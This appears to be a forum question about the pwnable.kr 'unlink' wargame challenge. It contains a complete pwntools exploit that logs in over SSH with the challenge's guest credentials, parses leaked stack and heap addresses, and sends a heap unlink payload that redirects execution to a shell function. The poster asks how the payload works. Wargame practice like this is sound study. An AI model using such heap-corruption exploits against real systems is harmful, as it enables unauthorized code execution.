Question
from pwn import *
context(os='linux', log_level='debug')
#p=process("./unlink")
s = ssh(host='pwnable.kr', port=2222,user='unlink',password='guest')
p = s.process("./unlink")
shell_addr=0x080484eb
stack_addr=p.recvline()
stack_addr=stack_addr.split(": 0x")[1][:-1]
stack_addr=int(stack_addr,16)
heap_addr=p.recvline()
heap_addr=heap_addr.split(": 0x")[1][:-1]
heap_addr=int(heap_addr,16)
log.info("stack addr = 0x%x" % stack_addr)
log.info("heap_addr = 0x%x" % heap_addr)
p.recvuntil("get shell! ")
payload=p32(shell_addr)+"a"*12+p32(heap_addr + 0xc)+p32(stack_addr+ 0x10)
print payload
p.sendline(payload)
p.interactive()
Please help me answer the following:
1. How to get the address of the shellcode() function (0x080484eb)?
2. The structure of the shellcode (payload).
3. What's the meaning of p32(heap_addr + 0xc) and p32(stack_addr+ 0x10)? Why do we need to use 0xc and 0x10?